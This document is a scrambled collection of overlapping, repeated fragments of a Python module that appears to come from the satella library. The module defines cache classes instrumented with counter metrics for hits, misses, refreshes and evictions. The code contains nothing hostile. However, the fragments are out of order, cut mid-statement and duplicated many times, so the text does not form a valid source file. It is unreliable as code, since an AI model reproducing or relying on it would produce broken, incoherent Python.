is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if", "if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K,", "how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1)", "self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict", "cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes", "not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if", "import time import typing as tp from 
satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from", "import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import", "def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric]", "ExclusiveWritebackCache from satella.coding.typing import K, V from .. import Metric from ..metric_types.callable import", "counter metric that will be updated with +1 each time there's a cache", "\"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size:", "be updated with +1 each time there's a cache miss :param refreshes: a", "will be updated with +1 each time there's a cache miss :param refreshes:", "__init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] =", "import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__)", "cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if", "def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None,", "if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K,", "= None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: 
tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs)", "from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K,", "class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] =", "evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item):", "self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if", "hit :param cache_miss: a counter metric that will be updated with +1 each", "cache hit :param cache_miss: a counter metric that will be updated with +1", "K, V from .. import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import", "self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param", "class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! 
:param cache_hits: a counter metric", "that will be updated with +1 each time there's a cache hit :param", "took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric]", "cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item):", "time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] =", "self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]):", "super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1)", "tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if", "tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes:", "each time there's a cache hit :param cache_miss: a counter metric that will", "from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict", "+1 each time there's a cache refresh :param how_long_refresh_takes: a metric that will", "entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1)", "None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: 
old_value_getter", "how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return", "satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from .. import", "self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter,", "= cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self,", "value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits =", "expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes", "from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger", "= None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes:", "stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100,", "expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss", "a cache refresh :param how_long_refresh_takes: a metric that will be ticked with 
time", "= cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item):", ".. import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin", "V from .. import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric", "value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes", "= 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] =", "how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss =", "return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits:", "if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes:", "if self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if", "None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None,", "finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval,", "self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if 
self.has_info_about(item): if self.cache_hits:", "a cache miss :param refreshes: a metric that will be updated with +1", "self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits:", "**kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is not", "cache_miss: a counter metric that will be updated with +1 each time there's", "max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes:", "be updated with +1 each time there's a cache refresh :param how_long_refresh_takes: a", "time there's a cache refresh :param how_long_refresh_takes: a metric that will be ticked", "value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss:", "super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss", "refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter", "super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss =", "int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric]", "logging import time import typing as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache", "value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, 
time_getter=time.monotonic,", "if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\"", "that will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval: float,", "None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter =", "import K, V from .. import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter", "cache_hits: a counter metric that will be updated with +1 each time there's", "with +1 each time there's a cache miss :param refreshes: a metric that", "time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes =", "class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param cache_hits: a counter metric", "that will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval,", "= logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param cache_hits: a", "import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from .. 
import Metric", "expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] =", "= self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else:", "value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes:", "not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else:", "if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval,", "self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else: if", "__getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1)", "will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter,", "def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int", "LRUCacheDict with metrics! :param cache_hits: a counter metric that will be updated with", "..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with", "\"\"\" A LRUCacheDict with metrics! 
:param cache_hits: a counter metric that will be", "self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if", "time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions", "CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class", "self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ =", "import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\"", "= None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] =", "..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger =", "tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if", "('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None,", "a counter metric that will be updated with +1 each time there's a", "time there's a cache miss :param refreshes: a metric that will be updated", "V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss:", "= None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally:", "+1 each time 
there's a cache miss :param refreshes: a metric that will", "with +1 each time there's a cache hit :param cache_miss: a counter metric", "cache refresh :param how_long_refresh_takes: a metric that will be ticked with time value_getter", "+1 each time there's a cache hit :param cache_miss: a counter metric that", "super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits: a counter", "typing as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K,", "= None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting", "metric that will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval:", "= refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1)", "= cache_hits if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item):", "def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return", "cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes", "self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor,", "if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def", "cache miss :param refreshes: a metric that 
will be updated with +1 each", "evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict()", "tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return", "with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic,", "updated with +1 each time there's a cache miss :param refreshes: a metric", "cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric]", "import logging import time import typing as tp from satella.coding.structures import CacheDict, LRUCacheDict,", "metric that will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval,", "default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None,", "cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes:", "None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally:", "there's a cache refresh :param how_long_refresh_takes: a metric that will be ticked with", "import typing as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import", "= None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item)", "time import typing as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing", "there's 
a cache hit :param cache_miss: a counter metric that will be updated", "self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes", "self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss',", "time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None,", "\"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] =", "**kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is not None: entries_waiting.callable", "None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if", "will be updated with +1 each time there's a cache hit :param cache_miss:", "= how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self,", "self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self,", "tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin]", "there's a cache miss :param refreshes: a metric that will be updated with", "value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, 
value_getter_executor, cache_failures_interval, time_getter, default_value_factory,", "def __getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss:", "self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args,", "a metric that will be updated with +1 each time there's a cache", "return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter =", "float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] =", "took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None,", "value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes", "with time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None,", "that will be updated with +1 each time there's a cache miss :param", "value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits:", "self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict() def", "value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = 
how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval,", "updated with +1 each time there's a cache hit :param cache_miss: a counter", "MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param cache_hits: a counter metric that", "tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args,", "ticked with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None,", "None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if self.cache_hits:", "entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits", "how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits =", "satella.coding.typing import K, V from .. import Metric from ..metric_types.callable import CallableMetric from", "how_long_refresh_takes: a metric that will be ticked with time value_getter took \"\"\" def", "V]): \"\"\" A CacheDict with metrics! :param cache_hits: a counter metric that will", "CacheDict with metrics! 
:param cache_hits: a counter metric that will be updated with", "cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes", "default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes", "from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from ..", "if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits", "= None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] =", "= None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits", "will be updated with +1 each time there's a cache refresh :param how_long_refresh_takes:", "if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__", "max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions", "metric that will be updated with +1 each time there's a cache hit", "self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is not None: entries_waiting.callable =", "float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits:", "= cache_miss self.cache_hits = cache_hits if 
entries_waiting is not None: entries_waiting.callable = self.get_queue_length()", "cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric]", "tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin]", "self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not None:", "value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits", "cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if", "= None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter", "how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter =", "'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting:", "a cache hit :param cache_miss: a counter metric that will be updated with", "refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else:", "from .. 
import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from", "None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if", ":param cache_miss: a counter metric that will be updated with +1 each time", "be ticked with time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float,", "how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits", "is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1)", "each time there's a cache refresh :param how_long_refresh_takes: a metric that will be", "..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]):", "from satella.coding.typing import K, V from .. 
import Metric from ..metric_types.callable import CallableMetric", "Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin", "default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions =", "self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]):", "default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None,", "import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics!", "100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None,", "metric that will be updated with +1 each time there's a cache miss", "def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if", "self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions", "A CacheDict with metrics! 
:param cache_hits: a counter metric that will be updated", "CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A", "super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is not None:", "value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes =", "None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss", "expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric]", "entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in", "refresh :param how_long_refresh_takes: a metric that will be ticked with time value_getter took", "= None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] =", "self.cache_hits = cache_hits if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self,", ":param how_long_refresh_takes: a metric that will be ticked with time value_getter took \"\"\"", "return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits: a", "is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in self.in_cache:", "if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item", "CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from .. 
